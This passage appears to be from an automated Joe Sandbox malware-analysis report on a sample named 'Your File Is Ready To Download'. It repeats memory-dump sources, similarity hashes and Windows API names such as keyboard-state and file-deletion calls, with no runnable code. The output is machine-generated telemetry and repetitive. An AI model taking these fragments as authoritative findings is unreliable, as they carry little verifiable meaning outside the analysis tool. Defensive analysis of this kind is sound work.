                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCodeCountExitHandleProcessTick
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1079426074-0
                                                                                                                                                                                                                          • Opcode ID: e1a3ed10aebd5cd46d0dc07aa2357efcb6d6e6b4a315d7c40cc8f219a31e5042
                                                                                                                                                                                                                          • Instruction ID: 3d760d75c5c17a42528695c4e5d9396f2cf2e871a0a131eb193270f97ee5edbd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1a3ed10aebd5cd46d0dc07aa2357efcb6d6e6b4a315d7c40cc8f219a31e5042
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2441CE72608B808AF756DF66E4543E927B5FB4DBD9F014126EF89477A9CB38C481C740
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessagePost$KeyboardState
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 857446259-0
                                                                                                                                                                                                                          • Opcode ID: 15adc71311cb775ed1fbadb6486e568230673f2749ed359a1d5977291c2225ca
                                                                                                                                                                                                                          • Instruction ID: f03c75429dfa0944f8ad8109e2f28eafe3e8b08e1308e0373cc97ea37175457c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15adc71311cb775ed1fbadb6486e568230673f2749ed359a1d5977291c2225ca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A621C0322186C085F3339322B8147EE6761B39D7E8F000165FF990BAF9CB3A9946D310
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessagePost$KeyboardState
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 857446259-0
                                                                                                                                                                                                                          • Opcode ID: da2789f02ea4cba1293bed030b38debb99721dbcc7098ce0545b1470c5c780ab
                                                                                                                                                                                                                          • Instruction ID: 461201481fed29e5502ac01d4da28dbe45d60afcffaf98ee9660998e9079a725
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da2789f02ea4cba1293bed030b38debb99721dbcc7098ce0545b1470c5c780ab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6621C3362185C085F3338322B8147E96B60B39D7A8F000155FF950BAF9CB7AD946D310
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$DeleteFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2815225636-0
                                                                                                                                                                                                                          • Opcode ID: 3f0ade653b1fd2698cda61273518b4eae990b4e527065918f7cb062061e5b0c6
                                                                                                                                                                                                                          • Instruction ID: 41524e2766148cf25f444c6ae4e15a434695c839f0af058ba91b05577b8aed52
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f0ade653b1fd2698cda61273518b4eae990b4e527065918f7cb062061e5b0c6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0711907260469182EB2A9B12E9147F9B3A1EB9CBC5F644511EF49036F0EB3AC541C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessagePost$KeyboardState
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 857446259-0
                                                                                                                                                                                                                          • Opcode ID: 37fd42ac9b941435543d6114d4224f705f71e47cf3b72097ea70634599f2fb9f
                                                                                                                                                                                                                          • Instruction ID: 33fcb8770caf4f4a675fb90860bc68d107b4a7765497fe05f7a5cd31398f2954
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37fd42ac9b941435543d6114d4224f705f71e47cf3b72097ea70634599f2fb9f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F21D2322186C085F3778322B8147EA7760B39D7E8F000155FF950BAF9CB3A9946D710
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocateHeap_callnewh_errno
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 638267422-0
                                                                                                                                                                                                                          • Opcode ID: 98618769027308b63622bb6cfbb8c4ab04824c1c9e9cb0d6adbd5341a5ddb42d
                                                                                                                                                                                                                          • Instruction ID: 181cd911a9d43cc91bf5c907a7d3f0c3725a88b33cda1abcd1de8227cfc3250d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98618769027308b63622bb6cfbb8c4ab04824c1c9e9cb0d6adbd5341a5ddb42d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2611847130524086FF9B4B1BE6847EC63919F5CBE4F198621AB55076F4E77C88828322
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00000001400C9248: _initp_misc_winsig.LIBCMT ref: 00000001400C9279
                                                                                                                                                                                                                            • Part of subcall function 00000001400C9248: EncodePointer.KERNEL32 ref: 00000001400CDCEF
                                                                                                                                                                                                                            • Part of subcall function 00000001400CDA48: InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00000001400CD2B0,?,?,00000000,00000001400CC2FF), ref: 00000001400CDA8D
                                                                                                                                                                                                                          • FlsAlloc.KERNEL32(?,?,00000000,00000001400CC2FF), ref: 00000001400CD2BB
                                                                                                                                                                                                                            • Part of subcall function 00000001400CF2B4: Sleep.KERNEL32(?,?,00000000,00000001400CD0F7,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400CF2F9
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,00000000,00000001400CC2FF), ref: 00000001400CD2EC
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00000001400CD300
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _lock$AllocCountCriticalCurrentEncodeInitializePointerSectionSleepSpinThreadValue_initp_misc_winsig
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3311150041-0
                                                                                                                                                                                                                          • Opcode ID: bf1268415874e4227b2dd1dd3cb46cc831adf265fbfa81def992912d0b46d8a7
                                                                                                                                                                                                                          • Instruction ID: eb2150f201df1bae93c20475c35b2bb6ea994e67c686ad13f7b259438441eff6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf1268415874e4227b2dd1dd3cb46cc831adf265fbfa81def992912d0b46d8a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5201123020874181FB5AAB7798453DC3295AF4D7E0F144729B626872F1EE38C4429321
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcstoi64
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1512447906-0
                                                                                                                                                                                                                          • Opcode ID: 044dffa3718fb0df74317192a1f86a910b8fc95589bb25715463b4d6a6fca667
                                                                                                                                                                                                                          • Instruction ID: f99df26c046da111d735d2d823b9b5a28b3e61e6090f83efd9a9bc9495379a78
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 044dffa3718fb0df74317192a1f86a910b8fc95589bb25715463b4d6a6fca667
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18717132301BC48ADB66CF2698447E923A5F798BD8F584225FB190BBA9DF34C991C740
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00000000,000000014002057D), ref: 00000001400A95A6
                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00000000,000000014002057D), ref: 00000001400A965B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Info
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1807457897-0
                                                                                                                                                                                                                          • Opcode ID: 090751b588551e7fb12663856a2277cb7211cce2b324e714cee218f9d8558177
                                                                                                                                                                                                                          • Instruction ID: 7d504ae26118fca3c94e3a7b4852b9a4c452f972b9310305d9b48ab701188fea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 090751b588551e7fb12663856a2277cb7211cce2b324e714cee218f9d8558177
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52418C72701B4085EB6A8F6AE45439D7BA1EBA9FD4F488219EB45073F8DB38C481CF41
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$ForegroundVisible
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4078700383-0
                                                                                                                                                                                                                          • Opcode ID: 323e2c0b9b66a1b4b70ce7e71d3a47a8c39045dcd8e815535cc6bf05b00196d1
                                                                                                                                                                                                                          • Instruction ID: 347f87b21ca5f235796bc58cea929a4e5286434b37936b4d1f717e5e82325f8d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 323e2c0b9b66a1b4b70ce7e71d3a47a8c39045dcd8e815535cc6bf05b00196d1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C421B031A04BC081FF626B57A8587E96BA2E79DBC4F644415EB4C076E1EFBCC4868301
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2959964966-0
                                                                                                                                                                                                                          • Opcode ID: 5090c9f23ce9d11f09d96a89bb765753d8bddb85b80969df1d768e3d44018cbd
                                                                                                                                                                                                                          • Instruction ID: 63cd7bd7490fbbb9e2e8db61560020efa3746afd32d2a7c02d4e7e39457ab6e7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5090c9f23ce9d11f09d96a89bb765753d8bddb85b80969df1d768e3d44018cbd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5521053231478286EB569B2AE5403AE3B90BB487D0F144231BF5A8B6F5DB38C411CB10
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$Post$SendTimeout$ProcWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2617672042-0
                                                                                                                                                                                                                          • Opcode ID: cbbd2f1ed78fe0b643a4e3599133d563c1f7c60fc94972649405193cbb8c7ec3
                                                                                                                                                                                                                          • Instruction ID: 835dc6e3d843a137295def1bc4f3a0e330071f37c9421674d1436fb837b6887a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbbd2f1ed78fe0b643a4e3599133d563c1f7c60fc94972649405193cbb8c7ec3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC117C35314A8089EBB6DB3794157EB17A1E74DBD4F281412AF4A577B2CA3BD842C300
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnvironmentStrings$Free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3328510275-0
                                                                                                                                                                                                                          • Opcode ID: bcad5650295df2f642541d7808201124abfcdd13beb5b36c2ed93cc047ae856d
                                                                                                                                                                                                                          • Instruction ID: f0c717ee7f642112c1060bafb0eb856db9b713e8b4142c0a2dde65c1bb6b4680
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcad5650295df2f642541d7808201124abfcdd13beb5b36c2ed93cc047ae856d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79016232B0678185FE66AF57A5553AD62A0EF6CFC0F4D4024FB4907BA5EE38C5839710
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EncodePointer_initp_misc_winsig
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2349294043-0
                                                                                                                                                                                                                          • Opcode ID: 8437b7c824bda2776777e3ced0cb9816439660f20e892eba587c46d2e50f9e49
                                                                                                                                                                                                                          • Instruction ID: 5561ba7336777a15b7314413e18d5b7e336282bb39ca0395ffc6e35def69d193
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8437b7c824bda2776777e3ced0cb9816439660f20e892eba587c46d2e50f9e49
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58E0E570A8934540E90EBB6368523EC32505B8EBC0F441035BB07073F2DD3CC1525301
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • malloc.LIBCMT ref: 00000001400CF25F
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _FF_MSGBANNER.LIBCMT ref: 00000001400C8FA4
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400CF264,?,?,00000000,00000001400CDBCD,?,?,?,00000001400CDC77,?,?,00000000,00000001400CD065), ref: 00000001400C8FC9
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _callnewh.LIBCMT ref: 00000001400C8FE2
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FED
                                                                                                                                                                                                                            • Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FF8
